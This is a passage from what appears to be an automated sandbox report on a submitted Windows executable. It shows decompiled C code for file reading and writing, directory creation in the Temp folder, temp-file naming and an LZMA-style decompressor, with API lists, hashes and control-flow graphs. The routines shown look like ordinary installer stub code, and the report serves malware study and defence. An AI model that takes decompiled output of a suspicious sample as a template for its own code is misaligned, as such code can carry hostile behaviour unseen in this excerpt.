											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                0x00402f76
                0x00402f80
                0x00402f82
                0x00402f89
                0x00402f8d
                0x00402f98
                0x00402f98
                0x00402fa0
                0x00402fa2
                0x00402fa9
                0x00402fc5
                0x00402fc9
                0x00403092
                0x00403092
                0x00000000
                0x00402fd8
                0x00402fdb
                0x00402fe1
                0x00402fe8
                0x00402feb
                0x00402ff4
                0x00403061
                0x00403067
                0x00403069
                0x00403069
                0x0040307b
                0x0040307f
                0x00000000
                0x00403081
                0x00403081
                0x00403084
                0x0040308a
                0x00000000
                0x0040308a
                0x00402ff6
                0x00402ff9
                0x0040308d
                0x0040308d
                0x00402fff
                0x00403004
                0x00403004
                0x0040300c
                0x0040300e
                0x0040300e
                0x0040301f
                0x00403023
                0x00000000
                0x00000000
                0x00403037
                0x0040303f
                0x0040305d
                0x00403094
                0x00403094
                0x00403046
                0x00403046
                0x00403049
                0x0040304c
                0x0040304f
                0x00403059
                0x00000000
                0x0040305b
                0x00000000
                0x0040305b
                0x00403059
                0x00000000
                0x0040303f
                0x00000000
                0x00403004
                0x00402ff9
                0x00402ff4
                0x00402feb
                0x00402fc9
                0x00403095
                0x00403099

                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 00402F98
                • ReadFile.KERNELBASE(?,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,00000020,00000020,?,00402F1D,000000FF,00000000,00000000,?), ref: 00402FC5
                • ReadFile.KERNELBASE(tCPInfo,00004000,00007DE4,00000000,?,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 0040301F
                • WriteFile.KERNELBASE(00000000,tCPInfo,00007DE4,000000FF,00000000,?,00402F1D,000000FF,00000000,00000000,?,00007DE4), ref: 00403037
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$Read$PointerWrite
                • String ID: tCPInfo
                • API String ID: 2113905535-2120998202
                • Opcode ID: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                • Instruction ID: 921f3f76ada69b898c24bbee4c45453848788fed2ed6be28b521a649f4e8a62f
                • Opcode Fuzzy Hash: 85f9b32b3f954e73cf89dba4bc253831fee770f0b6474c0430461d584885da6e
                • Instruction Fuzzy Hash: 31313A31901209FBDF21CF65DD44AAE7FBCEB45365F20843BFA04A6194D2349E40DB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004015BB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 551 4015bb-4015ce call 402a85 call 40567b 556 4015d0-4015eb call 405612 CreateDirectoryA 551->556 557 401612-401615 551->557 566 401608-401610 556->566 567 4015ed-4015f8 GetLastError 556->567 558 401635-4021bf call 401423 557->558 559 401617-401630 call 401423 call 405af4 SetCurrentDirectoryA 557->559 572 40291a-402929 558->572 559->572 566->556 566->557 568 401605 567->568 569 4015fa-401603 GetFileAttributesA 567->569 568->566 569->566 569->568
                C-Code - Quality: 85%
                			E004015BB(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A85(0xfffffff0);
				_t10 = E0040567B(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405612(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405AF4("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                0x004015bb
                0x004015c2
                0x004015c5
                0x004015ca
                0x004015ce
                0x004015d0
                0x004015d8
                0x004015de
                0x004015e0
                0x004015e3
                0x004015eb
                0x004015f8
                0x00401605
                0x00401605
                0x004015fa
                0x004015fb
                0x00401603
                0x00000000
                0x00000000
                0x00401603
                0x004015f8
                0x00401608
                0x0040160b
                0x0040160d
                0x0040160e
                0x004015d0
                0x00401615
                0x00401635
                0x004021ba
                0x00401617
                0x00401619
                0x00401624
                0x0040162a
                0x0040162a
                0x0040291d
                0x00402929

                APIs
                  • Part of subcall function 0040567B: CharNextA.USER32(:T@,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 00405689
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040568E
                  • Part of subcall function 0040567B: CharNextA.USER32(00000000), ref: 0040569D
                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FB
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040162A
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 0040161F
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 3751793516-1943935188
                • Opcode ID: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                • Instruction ID: 63bcb5d4f1e8c965e9b2f85ce20a33f9a17abe043d5819b309257051beb803d0
                • Opcode Fuzzy Hash: ac794f138ba7f61467d4ebe51835dd724794318f642f069794646da26921047b
                • Instruction Fuzzy Hash: B9012B31908050ABDB216F755D4497F3774DA55325B28063FF4D2B32E2D63C0D42962E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004057FA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 576 4057fa-405804 577 405805-40582f GetTickCount GetTempFileNameA 576->577 578 405831-405833 577->578 579 40583e-405840 577->579 578->577 580 405835 578->580 581 405838-40583b 579->581 580->581
                C-Code - Quality: 100%
                			E004057FA(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                0x004057fe
                0x00405804
                0x00405805
                0x00405805
                0x00405806
                0x0040580d
                0x00405817
                0x00405824
                0x00405827
                0x0040582f
                0x00000000
                0x00000000
                0x00405833
                0x00000000
                0x00000000
                0x00405835
                0x00000000
                0x00405835
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 0040580D
                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405827
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-1721151800
                • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                • Instruction ID: 2f33edf353eb26188edb3eebd43b66705c4d1fe0bdf9ced7dfec13a37dcb2b50
                • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                • Instruction Fuzzy Hash: 5BF0A037748248BAE7105E55EC04B9B7F9DDF91760F14C02BFE089A1C0D6B09968CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405ED4 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 586 405ed4-405ef7 587 405f01-405f04 586->587 588 405ef9-405efc 586->588 590 405f07-405f10 587->590 589 406921-406925 588->589 591 405f16 590->591 592 40691e 590->592 593 405fc2-405fc6 591->593 594 406032-406036 591->594 595 405f1d-405f21 591->595 596 40605d-406704 591->596 592->589 597 406872-40687c 593->597 598 405fcc-405fe5 593->598 601 406881-40688b 594->601 602 40603c-406050 594->602 599 405f27-405f34 595->599 600 406909-40691c 595->600 605 406706-40671c 596->605 606 40671e-406734 596->606 597->600 604 405fe8-405fec 598->604 599->592 607 405f3a-405f80 599->607 600->589 601->600 608 406053-40605b 602->608 604->593 609 405fee-405ff4 604->609 610 406737-40673e 605->610 606->610 611 405f82-405f86 607->611 612 405fa8-405faa 607->612 608->594 608->596 615 405ff6-405ffd 609->615 616 40601e-406030 609->616 617 406740-406744 610->617 618 406765-406771 610->618 619 405f91-405f9f GlobalAlloc 611->619 620 405f88-405f8b GlobalFree 611->620 613 405fb8-405fc0 612->613 614 405fac-405fb6 612->614 613->604 614->613 614->614 621 406008-406018 GlobalAlloc 615->621 622 405fff-406002 GlobalFree 615->622 616->608 623 4068f3-4068fd 617->623 624 40674a-406762 617->624 618->590 619->592 626 405fa5 619->626 620->619 621->592 621->616 622->621 623->600 624->618 626->612
                C-Code - Quality: 98%
                			E00405ED4(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406926))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
